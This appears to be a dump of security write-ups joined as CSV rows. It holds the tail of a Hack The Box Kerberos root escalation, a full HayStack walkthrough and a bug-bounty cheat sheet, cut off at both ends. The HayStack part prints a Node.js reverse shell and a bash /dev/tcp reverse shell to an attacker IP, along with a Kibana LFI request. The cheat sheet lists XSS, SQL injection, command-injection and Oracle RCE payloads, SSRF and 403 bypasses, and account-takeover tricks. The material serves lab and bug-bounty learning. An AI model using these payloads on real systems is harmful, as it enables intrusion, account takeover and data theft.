`root` afterwards...\n\n```bash\n[admin@srv01 ~]$\nkadmin -r REALCORP.HTB -p kadmin/admin@REALCORP.HTB -k -t /etc/krb5.keytab\nadd_principal root@REALCORP.HTB\n<Enter a password 2 times>\nexit\nksu root\n<Enter the same password>\n```\n\n![](src/root.png)\n\nAnd we finally R00Ted the machine....\n\n![](/src/gifs/pwned.gif)\n\n---\n\n# Closing\nIf you liked my writeup, consider [suporting](https://www.buymeacoffee.com/f4T1H21) a student to get `OSCP` exam and __+respecting__ my profile in HTB.\n\n<a href=""https://app.hackthebox.eu/profile/184235"">\n <img src=""https://www.hackthebox.eu/badge/image/184235"" alt=""f4T1H"">\n </img>\n</a>\n<br>\n<a href=""https://www.buymeacoffee.com/f4T1H21"">\n <img src=""https://raw.githubusercontent.com/f4T1H21/f4T1H21/main/support.png"" height=""40"" alt=""Support"">\n </img>\n</a>\n\n# Resources\n|`CNAME record`|https://en.wikipedia.org/wiki/CNAME_record|\n|:-|:-|\n|__`Proxychains`__|__https://www.youtube.com/watch?v=NN9fQwiomAU__|\n|__`WPAD protocol`__|__https://en.wikipedia.org/wiki/Web_Proxy_Auto-Discovery_Protocol__|\n|__`CVE 2020-7247`__|__https://www.qualys.com/2020/01/28/cve-2020-7247/lpe-rce-opensmtpd.txt__|\n|__`CVE 2020-7247 PoC exploit`__|__https://github.com/f4T1H21/CVE-2020-7247__|\n|__`.k5login file`__|__https://web.mit.edu/kerberos/krb5-1.5/krb5-1.5.4/doc/krb5-user/Granting-Access-to-Your-Account.html__|\n|__`keytab file`__|__https://kb.iu.edu/d/aumh__|\n|__`Kerberos administration program`__|__https://web.mit.edu/kerberos/krb5-1.12/doc/admin/admin_commands/kadmin_local.html__|\n|__`Kerberized su`__|__https://web.mit.edu/kerberos/krb5-latest/doc/user/user_commands/ksu.html__|\n\n<br>\n\n___-Written by f4T1H-___\n"
4,"# HayStack\n\n![eyER9x.png](https://s2.ax1x.com/2019/08/04/eyER9x.png)\n\n## Introduction\n\nTarget: 10.10.10.115(Linux)\n\nKali: 10.10.16.61\n\nHayStack is an easy box in hack the box. But it does isn't easy at all. It's annoying to find the user and password in the messy Spanish. For the root, you should have a basic understanding of ELK. Hence, the box is quite fresh in htb.\n\n## Information Enumeration\n\nAs usual, nmap is utilized to detect detailed ports and services.\n\n```\n# Nmap 7.70 scan initiated Sun Jun 30 01:10:53 2019 as: nmap -sT -p- --min-rate 1500 -oN ports 10.10.10.115\nNmap scan report for 10.10.10.115\nHost is up (0.27s latency).\nNot shown: 65532 filtered ports\nPORT STATE SERVICE\n22/tcp open ssh\n80/tcp open http\n9200/tcp open wap-wsp\n```\n\nThen detect the detailed services:\n\n```\n# Nmap 7.70 scan initiated Sun Jun 30 01:13:05 2019 as: nmap -sC -sV -p22,80,9200 -oN services 10.10.10.115\nNmap scan report for 10.10.10.115\nHost is up (0.38s latency).\n\nPORT STATE SERVICE VERSION\n22/tcp open ssh OpenSSH 7.4 (protocol 2.0)\n| ssh-hostkey:\n| 2048 2a:8d:e2:92:8b:14:b6:3f:e4:2f:3a:47:43:23:8b:2b (RSA)\n| 256 e7:5a:3a:97:8e:8e:72:87:69:a3:0d:d1:00:bc:1f:09 (ECDSA)\n|_ 256 01:d2:59:b2:66:0a:97:49:20:5f:1c:84:eb:81:ed:95 (ED25519)\n80/tcp open http nginx 1.12.2\n|_http-server-header: nginx/1.12.2\n|_http-title: Site doesn't have a title (text/html).\n9200/tcp open http nginx 1.12.2\n|_http-server-header: nginx/1.12.2\n|_http-title: 502 Bad Gateway\n```\n\nFor port 80, we find nothing except a picture of a needle. Exiftool is used to analyze. But nothing interesting found. Try to use gobuster to brute force the directory, but have not found any useful directories.\n\n![eDD780.png](https://s2.ax1x.com/2019/08/03/eDD780.png)\n\nFor port 9200, nmap seems to be failed to detect. But this port should be familiar to elasticserarch users. Elasticsearch is a popular search database in recent years. Something is interesting in elasticsearch. We will talk about this later.\n\n![eDrFKO.png](https://s2.ax1x.com/2019/08/03/eDrFKO.png)\n\n## Exploit\n\nIn the above, we have talked about the ports. The elasticsearch should be the point. Try to obtain the data of elasticsearch. There is no authentication for elasticsearch in default. Hence, we can read the data from elasticsearh. In the beginning, I have tried to use kibana to analyze the data. Kibana is one component of ELK, which is a powerful tool to analyze the data of elasticsearch. And it's easy to use. Just download the [files](https://www.elastic.co/cn/downloads/past-releases/kibana-6-4-2), then decompress the files. There is only one step to finish before run kibana. Modify `elasticsearch.url` in `config.yml`, it should be configured to `10.10.10.115:9200`. Then you can run kibana directly.\n\nWhen you access to kibana, you will find two indexes: `bank` and `quotes`. The `bank` seems to be data of bank users information, which seems not to be useful. For index `quotes`, we have found nothing but the quote of Spanish. To be honest, Spanish is really messy for me to read. And I cannot find anything interesting. Kibana is useful for query specific field. But `quotes` seems to be an article. So I decide to dump all the data of `quotes`. \n\n[elasticsearh-dump](https://github.com/taskrabbit/elasticsearch-dump) is useful to dump the data from elasticsearch. Firstly, install the tool by `npm install elasticdump -g`. Then dump the data by: \n\n```\nelasticdump \\n --input=http://production.es.com:9200/quotes \\n --output=quptes.json \\n --type=data\n```\n\nThe result will be json file of a list of objects consist of some keys. The most important is the quote in the result. But the json is still not convenient to read. And the id may be the sequence of quotes. So, I decide to write a script to order the quotes by id and join all the quotes together.\n\n```python\nimport json\nresult = {}\ntxt = """"\nwith open(""quotes.json"") as f:\n data = f.readlines()\n for ele in data:\n obj = json.loads(ele)\n id = int(obj[""_id""])\n result[id] = obj[""_source""][""quote""]\n for i in sorted(result.keys()):\n print(i)\n txt = txt + result[i] + ""\n\n""\nwith open(""result.md"", ""w"") as f1:\n f1.write(txt)\n```\n\nNow, I have the result of quotes. And it's easy to read. I place this file in Github. When I read this file by Chrome, Chrome can help me translate this article. So, it's easier to find special things in the article. I have found two interesting strings in the article.\n\n```\nTengo que guardar la clave para la maquina: dXNlcjogc2VjdXJpdHkg\n```\n\n```\nEsta clave no se puede perder, la guardo aca: cGFzczogc3BhbmlzaC5pcy5rZXk=\n```\n\nIf you translate the two stings into English respectively.\n\n```\nI have to save the password for the machine: dXNlcjogc2VjdXJpdHkg\n```\n\n```\nThis key cannot be lost, I keep it here: cGFzczogc3BhbmlzaC5pcy5rZXk=\n```\n\nThe end of the strings is encoded by base64. When decoded, we can find the username and password. Then you can ssh by the username and password. \n\n![erZrTA.png](https://s2.ax1x.com/2019/08/03/erZrTA.png)\n\nTo be honest, I don't like the user of the box. But it does works as the keyword: you have to find a needle in haystack.\n\n## PrivEsc\n\nIf you look around the box, you will find the box is installed with ELK. You can find kibana and logstash in the box. If you google `kibana exploit`. You will find [CVE-2018-17246](https://github.com/mpgn/CVE-2018-17246) in Github. It has detailed illustrates the ways to exploit.\n\nHowever, there is a problem that the kibana service is only running in local. So you cannot access kibana service externally. There is a way to utilize ssh to redirect the network stream.\n\n```\nssh 5601:localhost:5601 security@10.10.10.115\n```\n\nThen, we can access to the kibana service in 10.10.10.115 by access to `localhost:5601`. Place the `server.js` in tmp directory of the target machine.\n\n```\n// server.js\n(function(){\n var net = require(""net""),\n cp = require(""child_process""),\n sh = cp.spawn(""/bin/sh"", []);\n var client = new net.Socket();\n client.connect(1234, ""10.10.16.61"", function(){\n client.pipe(sh.stdin);\n sh.stdout.pipe(client);\n sh.stderr.pipe(client);\n });\n return /a/; // Prevents the Node.js application form crashing\n})();\n```\n\nThen we can implement by burp, remember to set up nc listener `nc -lvnp 1234`\n\n```\nGET /api/console/api_server?sense_version=@@SENSE_VERSION&apis=../../../../../../.../../../../tmp/server.jssudo -l HTTP/1.1\nHost: localhost:5601\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: http://localhost:5601/app/kibana\ncontent-type: application/json\nkbn-version: 6.4.2\norigin: http://localhost:5601\nConnection: close\n```\n\nWait for a while, then we are kibana.\n\n[![erlWZT.png](https://s2.ax1x.com/2019/08/03/erlWZT.png)](https://imgchr.com/i/erlWZT)\n\nBut we are still not root! Don't be upset. Let's move on. If we look at the logstash in the machine carefully, we will find something interesting. We find the user group `kibana` has write permission of `conf.d` of logstash.\n\n```\nls -lah\ntotal 52K\ndrwxr-xr-x. 3 root root 183 jun 18 22:15 .\ndrwxr-xr-x. 83 root root 8,0K jun 24 05:44 ..\ndrwxrwxr-x. 2 root kibana 62 jun 24 08:12 conf.d\n-rw-r--r--. 1 root kibana 1,9K nov 28 2018 jvm.options\n-rw-r--r--. 1 root kibana 4,4K sep 26 2018 log4j2.properties\n-rw-r--r--. 1 root kibana 342 sep 26 2018 logstash-sample.conf\n-rw-r--r--. 1 root kibana 8,0K ene 23 2019 logstash.yml\n-rw-r--r--. 1 root kibana 8,0K sep 26 2018 logstash.yml.rpmnew\n-rw-r--r--. 1 root kibana 285 sep 26 2018 pipelines.yml\n-rw-------. 1 kibana kibana 1,7K dic 10 2018 startup.option\n```\n\n`conf.d` is the config directory of logstash consists of three files in general. Take a deep look into the directory, you'll find an interesting thing. There is a command executes in `output.conf`. If you have basic knowledge of logstash, you should know the function of the three files. `input.conf` is used to config the data source. `filter.conf` is used to process the data, which is usually combined with grok. `output.conf` is used to output the processed data. We can find there is an `exec` in the `output.conf`.\n\nSo the exploit is very clear. Create a file in `/opt/kibana/` whose name begins with `logstah_`. And make sure the content in the file can be parsed by grok correctly. Then the command can be executed successfully. The most important part is how to create the content to be parsed to correct `comando`. So you should know how to use grok. Grok is utilized to recognize specific fields by the regular expression. [Grok Debugger] is a useful tool to test grok online.\n\n![eyPIxg.png](https://s2.ax1x.com/2019/08/04/eyPIxg.png)\n\nThe expression is quite simple. If you know the regular expression, it will not be hard to understand the expression here.\n\n**filter.conf**\n\n```\nfilter {\n if [type] == ""execute"" {\n grok {\n match => { ""message"" => ""Ejecutar\s*comando\s*:\s+%{GREEDYDATA:comando}"" }\n }\n }\n}\n```\n\n**input.conf**\n\n```\ninput {\n file {\n path => ""/opt/kibana/logstash_*""\n start_position => ""beginning""\n sincedb_path => ""/dev/null""\n stat_interval => ""10 second""\n type => ""execute""\n mode => ""read""\n }\n}\n```\n\n**output.conf**\n\n```\noutput {\n if [type] == ""execute"" {\n stdout { codec => json }\n exec {\n command => ""%{comando} &""\n }\n }\n}\n```\n\nNow, we have known how to create the corresponding `comando`. The next step is to choose the command to execute. There is not nc in the machine. But there's python and perl in the machine. But the reverse shell command is a little long. So I choose to use `bash -i >& /dev/tcp/10.10.16.61/1234 0>&1`. Write the content to the corresponding file:\n\n```\necho ""Ejecutar comando: bash -i >& /dev/tcp/10.10.16.61/1234 0>&1"" > /opt/kibana/logstash_1.txt\n```\n\nUse the nc to listen at port 1234, wait a while, root is coming.\n\n![eykUVs.png](https://s2.ax1x.com/2019/08/04/eykUVs.png)\n"
5,"# BugBounty Tips\t\nCollection of `#bugbountytips` from twitter and my bash-jutsu.\n# Recon\n```\nGoogle the company copyright footer to get more domains.\nUse whoxy.com to perform reverse whois lookups with the email used to register the main domain/\nSearch for slide,docs,demos and video tutorials by your target. Manny innocent examples could leak juicy endpoints.\nUse OpenSSL to get certificates. They can contain valuable info and common names form finding more subdomains.\nTry to recreate data from deleted accounts by siging up with the old email address.\nCheck text version of HTML e-mail for template injections\nWhen testing Rails Application add .json to url endpoints.\ncat file | grep -Eo ""(http|https)://[a-zA-Z0-9./?=_-]*""*\ncurl http://host.xx/file.js | grep -Eo ""(http|https)://[a-zA-Z0-9./?=_-]*""* \ngrep -EHirn ""accesskey|admin|aes|api_key|apikey|checkClientTrusted|crypt|http:|https:|password|pinning|secret|SHA256|SharedPreferences|superuser|token|X509TrustManager|insert into|DB_USER|DB_PASSWORD"" folder/\n```\n\n# Subdomain Enumeration\n```\nsublist3r -d $1 -o $1.txt\nmkdir thirdlevel\necho ""Gathering full third-level domain with sublister""\nfor domain in $(cat $1.txt); do sublist3r -d $domain -o thirdlevel/$domain.txt; cat thirdlevel/$domain.txt | sort -u >> final.txt; done \necho ""Probing for alive third-levels...""\ncat final.txt | httprobe > probed.txt\n```\n\n# subdomain level extraction\n|Regex pattern\t|Domain level match|\n| ------ | ------ |\n|grep -P '^(?:[a-z0-9]+\.){1}[^.]*$'\t|2nd level domains only|\n|grep -P '^(?:[a-z0-9]+\.){2}[^.]*$'\t|3rd level domains only|\n|grep -P '^(?:[a-z0-9]+\.){2,}[^.]*$'\t|3rd level domains or higher|\n|grep -P '^(?:[a-z0-9]+\.){2,3}[^.]*$'\t|3rd to 4th level domains only|\n|grep -P '^(?:[a-z0-9]+\.){3,}[^.]*$'\t|4th level domains or higher|\n\n# Check live \n```\ncat GREPABLENMAP.gnmap | grep 443/open | cut -d ""("" -f 1 | cut -d : -f 2| tr -d "" "" | sed -E 's#https?://##I' | sed -E 's#/.*##' | sed -E 's#^\*\.?##' | sed -E 's#,#\n#g' | tr '[:upper:]' '[:lower:]' | uniq | sed -e 's/^/https:\/\//' | httpx -silent -timeout 2 -threads 100 -status-code -mc 200,302 |anew \n```\n# Check live webapps from sublis3r\n```\ncat subdomains.txt | sed -E 's#https?://##I' | sed -E 's#/.*##' | sed -E 's#^\*\.?##' | sed -E 's#,#\n#g' | tr '[:upper:]' '[:lower:]' | uniq | sed -e 's/^/https:\/\//' | httpx -silent -timeout 2 -threads 100 -status-code -mc 200,302 |anew \n```\n# Filter ffuf output\n```\ncat * | jq | grep ""url\"""" | grep -v ""replayproxyurl"" |grep -v ""proxyurl"" | grep -v ""FUZZ"" | cut -d \"" -f4\n```\n\n# Tools\n```\nUse exiftool to extract metadata from documents, it might reveal vulnerable htmltopdf generators\nUse cloud_enum to find open google buckets or azure accounts \nUse Grep to extract endpoints with grep: grep -o -E '(https?://)?/?[{}a-z0-9A-Z_\.-]{2,}/[{}/a-z0-9A-Z_\.-]+'\nUse WayBackmachine combined with paraminer or parameth\nPassive parameter mining web.archive.org /cdx/search/cdx?url=*.target.com/*&output=text&fl=original&collapse=urlkey\n```\n\n# Payloads\n```\nInject payloads in parameter names, ?<script>alerty</script>=true\nUse youtube(olx, etc...) videos with xss in names.\nUse round brackets to inject payload into valid e-mail address.\nX-Forwarded-For: ${payload}\nUse longstring parameters for stacktrace.\nWAFBYPASS ?page="";confirm`1`// Rightwards -> 302; ?pag%65="";confirm`1`// Rightwards -> 200 + XSS!\nRedirect bypass %26next=http://example.com \nWhen testing nodejs site add %ff at the end of url https://target.com/%ff, most of times cause error and return stacktrace with full path\nAdd [] to name of parrameter: pwd= ->pwd[]=\nwhen interacting with db try to put % in parameter ?item=%\n```\n\n# Authentication & Autorization \n```\nUUID Idor Trick, Register user with the same name, it maybe return uuid.\nTry to bruteforce login endpoint. /login/${oauth_provider}, login/facebook, login/oauth/twitter login/oauth/v2/yahoo\n403 Forbidden bypass, https://host.com/path =403, https://host.com/%2e/path = 200, \nBypass paywalls by using Google Bot user agent.\nUser securitytrails.com to find the originating server IP\nDo match and replace form false to true.\nSet your birthday for today ot tomorrow to get discounts.\nSkip steps: /step/shipping -> ~~/step/payment~~ -> /step/confirm\nCheck does blackfriday coupon codes expires.\nUse blind xss as password.\nLogin to site using Facebook and try tochange userid during POST requests\n/api/v1/users/profile?id=MYID&id=ANOTHERUSERID -> HTTP 200 \n```\n# Email Restriction bypass\n```\ninti(;inti@inti.io;)@whitelisted.com\n\n→ inti(;\n→ inti@inti.io → my inbox!\n→ ;)@whitelisted.com\n● inti@inti.io(@whitelisted.com)\n● inti+(@whitelisted.com;)@inti.io\n```\n\n# Email Address input fuzz\n```\ntest+(<script>alert(1)</script>)@example.com\ntest@example(<script>alert(1)</script>).com\n""<script>alert(1)</script>""@example.com\n\n""<%=7*7%>""@example.com\ntest+(${{7*7}})@example.com\n\n""'OR 1=1--""@example.com\n""mail');DROP TABLE users;--""@example.com\n\ntest@example.burpcollaborator.net\ntest@[127.0.0.1]\n\nvictim&email=attacker@example.com\n\n""%0d%0aContent-Lenght:%200@0d%0a%0d%0a""@example.com""recipient@test.com>\r\nRCPT TO:<victim+""@test.com\n```\n# Account takeover via Email \n```\nGET /passwordreset\n\nDouble parameter (aka. HPP / HTTP parameter pollution):\nemail=victim@xyz.tld&email=hacker@xyz.tld\nCarbon copy:\nemail=victim@xyz.tld%0a%0dcc:hacker@xyz.tld\nUsing separators:\nemail=victim@xyz.tld,hacker@xyz.tld\nemail=victim@xyz.tld%20hacker@xyz.tld\nemail=victim@xyz.tld|hacker@xyz.tld\nNo domain:\nemail=victim\nNo TLD (Top Level Domain):\nemail=victim@xyz\nJSON table:\n{""email"":[""victim@xyz.tld"",""hacker@xyz.tld""]}\n```\n# Password Reset:\n```\nreset userpassword: user@email.com.burpcolaborator.com\n```\n# Find GET parameters in example.com\n```\nassetfinder example.com | gau | egrep -v '(.css|.png|.jpeg|.jpg|.svg|.gif|.wolf)' | while read url; do vars=$(curl -s $url | grep -Eo ""var [a-zA-Z0-9]+"" | sed -e 's,'var','""$url""?',g' -e 's/ //g' | grep -v '.js' | sed 's/.*/&=xss/g'); echo -e ""\e[1;33m$url\n\e[1;32m$vars""; done\n```\n\n# Command injection polyglot\n```\n/*$(ping -c 2 example.com)`ping -c 2 example.com``*/-ping -c 2 example.com-'/*$(ping -c 2 example.com)`ping -c 2 example.com` #*/-ping -c 2 example.com||'""||ping -c 2 example.com||""/*`*/\n/*$(echo 1 >/tmp/rce1)`echo 1 >/tmp/rce1``*/-echo 1 >/tmp/rce1-'/*$(echo 1 >/tmp/rce1)`echo 1 >/tmp/rce1` #*/-echo 1 >/tmp/rce1||'""||echo 1 >/tmp/rce1||""/*`*/\n|echo lol2137||a #' |echo lol2137||a #|"" |echo lol2137||a #\n||`ping -c 21 127.0.0.1` #' |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #\"" |ping -n 21 127.0.0.1\n||`ping -c 21 grb0fhwh3gg8b9g0nbeqddobp2vsjh.burpcollaborator.net` #' |ping -n 21 grb0fhwh3gg8b9g0nbeqddobp2vsjh.burpcollaborator.net||`ping -c 21 grb0fhwh3gg8b9g0nbeqddobp2vsjh.burpcollaborator.net` #\"" |ping -n 21 grb0fhwh3gg8b9g0nbeqddobp2vsjh.burpcollaborator.net\n||`dig grb0fhwh3gg8b9g0nbeqddobp2vsjh.burpcollaborator.net` #' |dig grb0fhwh3gg8b9g0nbeqddobp2vsjh.burpcollaborator.net||`dig grb0fhwh3gg8b9g0nbeqddobp2vsjh.burpcollaborator.net` #\"" |dig grb0fhwh3gg8b9g0nbeqddobp2vsjh.burpcollaborator.net\n$(sleep 21)\n```\n# SSRF Bypass list for localhost (127.0.0.1):\n```\nhttp://127.1/\nhttp://0000::1:80/\nhttp://[::]:80/\nhttp://2130706433/\nhttp://whitelisted@127.0.0.1\nhttp://0x7f000001/\nhttp://017700000001\nhttp://0177.00.00.01\n```\n\n# Top 25 SSRF parameters\n```\n?dest={target}\n?redirect={target}\n?uri={target}\n?path={target}\n?continue={target}\n?url={target}\n?window={target}\n?next={target}\n?data={target}\n?reference={target}\n?site={target}\n?html={target}\n?val={target}\n?validate={target}\n?domain={target}\n?callback={target}\n?return={target}\n?page={target}\n?feed={target}\n?host={target}\n?port={target}\n?to={target}\n?out={target}\n?view={target}\n?dir={target}\n```\n# Top 25 RCE parameters\n```\n?cmd={payload}\n?exec={payload}\n?command={payload}\n?execute{payload}\n?ping={payload}\n?query={payload}\n?jump={payload}\n?code={payload}\n?reg={payload}\n?do={payload}\n?func={payload}\n?arg={payload}\n?option={payload}\n?load={payload}\n?process={payload}\n?step={payload}\n?read={payload}\n?function={payload}\n?req={payload}\n?feature={payload}\n?exe={payload}\n?module={payload}\n?payload={payload}\n?run={payload}\n?print={payload}\n```\n# Top 25 LFI parameters\n```\n?cat={payload}\n?dir={payload}\n?action={payload}\n?board={payload}\n?date={payload}\n?detail={payload}\n?file={payload}\n?download={payload}\n?path={payload}\n?folder={payload}\n?prefix={payload}\n?include={payload}\n?page={payload}\n?inc={payload}\n?locate={payload}\n?show={payload}\n?doc={payload}\n?site={payload}\n?type={payload}\n?view={payload}\n?content={payload}\n?document={payload}\n?layout={payload}\n?mod={payload}\n?conf={payload}\n```\n\n# HackerOne redirect parameters\n```\n/[redirect]\n?targetOrigin=[redirect]\n?fallback=[redirect]\n?query=[redirect]\n?redirection_url=[redirect]\n?next=[redirect]\n?ref_url=[redirect]\n?state=[redirect]\n?l=[redirect]\n?redirect_uri=[redirect]\n?forum_reg=[redirect]\n?return_to=[redirect]\n?redirect_url=[redirect]\n?return_url=[redirect]\n?host=[redirect]\n?url=[redirect]\n?redirectto=[redirect]\n?return=[redirect]\n?prejoin_data=[redirect]\n?callback_url=[redirect]\n?path=[redirect]\n?authorize_callback=[redirect]\n?email=[redirect]\n?origin=[redirect]\n?continue=[redirect]\n?domain_name=[redirect]\n?redir=[redirect]\n?wp_http_referer=[redirect]\n?endpoint=[redirect]\n?shop=[redirect]\n?qpt_question_url=[redirect]\n?checkout_url=[redirect]\n?ref_url=[redirect]\n?redirect_to=[redirect]\n?succUrl=[redirect]\n?file=[redirect]\n?link=[redirect]\n?referrer=[redirect]\n?recipient=[redirect]\n?redirect=[redirect]\n?u=[redirect]\n?hostname=[redirect]\n?returnTo=[redirect]\n?return_path=[redirect]\n?image=[redirect]\n?requestTokenAndRedirect=[redirect]\n?retURL=[redirect]\n?next_url=[redirect]\n```\n\n# MORE PARAMETERS\nhttps://github.com/1ndianl33t/Gf-Patterns\n\n# Massive XSS\n```\n#!/bin/bash\n# $1 => example.domain\n\nsubfinder -d $1 -o domains_subfinder_$1\namass enum --passive -d $1 -o domains_$1\n\ncat domains_subfinder_$1 | tee -a domains_$1\ncat domains_$1 | filter-resolved | tee -a domains_$1.txt\n\ncat domains_$1.txt | ~/go/bin/httprobe -p http:81 -p http:8080 -p https:8443 | waybackurls | kxss | tee xss.txt\n```\n# Masive Top Parameters search\n```\nTBA \necho ""http://tesla.com"" | waybackurls | httpx -silent -timeout 2 -threads 100 | gf redirect | anew\n```\n# Juicy GoogleDorks\n```\nsite:example.com inurl:.cgi?\n```\n# File Upload and what to search\n```\nASP / ASPX / PHP5 / PHP / PHP3: Webshell / RCE\nSVG: Stored XSS / SSRF / XXE\nGIF: Stored XSS / SSRF\nCSV: CSV injection\nXML: XXE\nAVI: LFI / SSRF\nHTML / JS : HTML injection / XSS / Open redirect\nPNG / JPEG: Pixel flood attack (DoS)\nZIP: RCE via LFI / DoS\nPDF / PPTX: SSRF / BLIND XXE\n```\n# File upload chain\n```\n../../../tmp/lol.png —> for path traversal\nsleep(10)-- -.jpg —> for SQL injection\n<svg onload=alert(document.domain)>.jpg/png —> for XSS\n; sleep 10; —> for command injections\n```\n# Find JavaScript Files in Target.com\n```\necho target.com | gau | grep '\.js$' | httpx -status-code -mc 200 -content-type | grep 'application/javascript'\nor\ncat domains | httpx -silent | subjs | anew\n```\n# Extract endpoints from \*.js \n```\ncat file.js | grep -aoP ""(?<=(\""|\'|\`))\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=(\""|\'|\`))"" | sort -u\n```\n# Extract juicy data from js \n```\ncat hosts | httpx -silent | subjs | anew | httpx -silent -sr -mc 200 \ngrep -EHirn ""accesskey|admn|aes|api_key|apikey|password|secret|token"" ./output --color\n\n```\n# 403 bypass\n```\nhttps://target.com/admin/ –> HTTP 302 (redirect to login page)\nhttps://target.com/admin..;/ –> HTTP 200 OK\n\nhttps://target.com/../admin\nhttps://target.com/whatever/..;/admin\n\nsite.com/secret –> HTTP 403 Forbidden\nsite.com/secret/ –> HTTP 200 OK\nsite.com/secret/. –> HTTP 200 OK\nsite.com//secret// –> HTTP 200 OK\nsite.com/./secret/.. –> HTTP 200 OK\n\nX-Original-URL: /admin\nX-Override-URL: /admin\nX-Rewrite-URL: /admin\n\n/accessible/..;/admin\n/.;/admin\n/admin;/\n/admin/~\n/./admin/./\n/admin?param\n/%2e/admin\n/admin#\n\n```\n# Data leakage through .json\n```\nHere’s a tip to achieve sensitive data leak using .json extension.\n\nRequest:\nGET /ResetPassword HTTP/1.1\n{""email"":""victim@example.com""}\n\nResponse:\nHTTP/1.1 200 OK\nNow let’s try this instead:\n\nRequest:\nGET /ResetPassword.json HTTP/1.1\n{""email"":""victim@example.com""}\n\nResponse:\nHTTP/1.1 200 OK\n{""success"":""true"",""token"":""596a96-cc7bf-9108c-d896f-33c44a-edc8a""}\n```\n# Generate wordlist for target\n```\necho ""bugcrowd.com"" | subfinder -silent | hakrawler -plain -usewayback -scope yolo | sed $'s/[./?=:&#]/\\n/g' | anew\n```\n\n# Check for SQLi\n```\n/?q=1\n/?q=1'\n/?q=1""\n/?q=[1]\n/?q[]=1\n/?q=1`\n/?q=1\\n/?q=1/*'*/\n/?q=1/*!1111'*/\n/?q=1'||'asd'||' <== concat string\n/?q=1' or '1'='1\n/?q=1 or 1=1\n/?q='or''='\n```\n# SQLi in Email parameter\n\n| Payload | Response |Injection Status |\n| ------ | ------ |------ |\n|{“email”:”asd@a.com”}| {“code”:2002,”status”:200,”message”:”Email not found.”}|\tValid|\n|{“email”:”asd a@a.com”}|\t{“code”:2002,”status”:200,”message”:”Bad format”}|\tNot Valid|\t\n|{“email”:”\”asd a\”@a.com”}|\t{“code”:2002,”status”:200,”message”:”Bad format”}|\tNot Valid|\t\n|{“email”:”asd(a)@a.com”}|\t{“code”:2002,”status”:200,”message”:”Bad format”}|\tNot Valid|\t\n|{“email”:”\”asd(a)\”@a.com”}|\t{“code”:2002,”status”:200,”message”:”Email not found.”}|\tValid|\t\n|{“email”:”asd’a@a.com”}|\t{“code”:0,”status”:500,”message”:”Unspecified error”}|\tNot Valid|\t\n|{“email”:”asd’or’1’=’1@a.com”}|\t{“code”:2002,”status”:200,”message”:”Email not found.”}\tValid|\t\n|{“email”:”a’-IF(LENGTH(database())>9,SLEEP(7),0)or’1’=’1@a.com”}|\t{“code”:2002,”status”:200,”message”:”Bad format”}|\tNot Valid|\n|{“email”:”\”a’-IF(LENGTH(database())>9,SLEEP(7),0)or’1’=’1\”@a.com”}|\t{“code”:0,”status”:200,”message”:”Successful”}|\tValid\tDelay: 7,854 milis|\n|{“email”:”\”a’-IF(LENGTH(database())=10,SLEEP(7),0)or’1’=’1\”@a.com”}|\t{“code”:0,”status”:200,”message”:”Successful”}|\tValid\tDelay: 8,696 milis|\n|{“email”:”\”a’-IF(LENGTH(database())=11,SLEEP(7),0)or’1’=’1\”@a.com”}|\t{“code”:0,”status”:200,”message”:”Successful”}|\tValid\tNo delay|\n\n### Oracle\n```\n1) UNION SELECT CASE WHEN (SELECT ASCII(SUBSTR((SELECT user FROM dual), 1, 1 )) FROM dual) >71 THEN (dbms_pipe.receive_message(('a'),10)) ELSE NULL END FROM dual --\n1' AND 1=2 UNION SELECT SYS.KUPP$PROC.CREATE_MASTER_PROCESS('DBMS_SCHEDULER.create_program(''exec4'',''EXECUTABLE'',''c:\\WINDOWS\\system32\\cmd.exe /c type C:\\users\\public\\shell.ps1 | PowerShell.exe -noprofile - '',0,TRUE);DBMS_SCHEDULER.create_job(job_name=>''myjob11'',program_name=>''exec4'',start_date=>NULL,repeat_interval=>NULL,end_date=>NULL,enabled=>TRUE,auto_drop=>TRUE);dbms_lock.sleep(1);dbms_scheduler.drop_program(program_name=>''exec4'');dbms_scheduler.purge_log;'), null FROM DUAL --\n1' AND 1=1 UNION SELECT null, user FROM DUAL --\n```\n\n\n### Cool BurpPlugins\n```\nAutorize – To test BACs (Broken Access Control)\nBurp Bounty – Profile-based scanner\nActive Scan++ – Add more power to Burp’s Active Scanner\nAuthMatrix – Authorization/PrivEsc checks\nBroken Link Hijacking – For BLH (Broken Link Hijacking)\nCollaborator Everywhere – Pingback/SSRF (Server-Side Request Forgery)\nCommand Injection Attacker\nContent-Type Converter – Trying to bypass certain restrictions by changing Content-Type\nDecoder Improved – More decoder features\nFreddy – Deserialization\nFlow – Better HTTP history\nHackvertor – Handy type conversion\nHTTP Request Smuggler\nHunt – Potential vuln identifier\nInQL – GraphQL Introspection testing\nJ2EE Scan – Scanning J2EE apps\nJSON/JS Beautifier\nJSON Web Token Attacker\nParamMiner – Mine hidden parameters\nReflected File Download Checker\nReflected Parameter – Potential reflection\nSAML Raider – SAML testing\nUpload Scanner – File upload tester\nWeb Cache Deception Scanner\n```\n# Detect framework via favico\n```\ncat urls.txt | python3 favfreak.py -o output\n```\n\n### Password Poisoning\n```\n(1) Normal request:\n\nRequest:\nPOST /password-reset?user=123 HTTP/1.1\nHost: target.com\nLink received:\nhttps://target.com/reset-link=1g2f3guy23g\n(2) Basic HHI (Host Header Injection):\n\nRequest:\nPOST /password-reset?user=123 HTTP/1.1\nHost: evil.com\nLink received:\nnone\nError 404 - request blocked\n(3) Bypass technique:\n\nRequest:\nPOST https://target.com/password-reset?user=123 HTTP/1.1\nHost: evil.com\nLink received:\nhttps://evil.com/reset-link=1g2f3guy23g\n```\n### Find hostsname form given IP\n\n```\necho 192.168.69.69 | cero\n```\n\n### XSS Post Message POC\n```\nVulnerable PostMessage\n<script src=""//ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js""></script>\n<script>\nwindow.addEventListener(""message"", (event) => {\nconsole.log(event.data);\n$(event.data)\n}, false);\n</script>\n\n\nExploit \n<!DOCTYPE html>\n<html>\n <head>\n </head>\n<body>\n<script>\nvar myWindow = window.open(""http://example.com/test.html"")\n</script>\n<script>\nsetInterval(function(){myWindow.postMessage(""<img src=x onerror=alert(123);>"",""*"");},3000);\nwindow.onmessage = function (e) {\nconsole.log(e);\n};\n</script>\n</body>\n</html>\n```\n### Deserialization 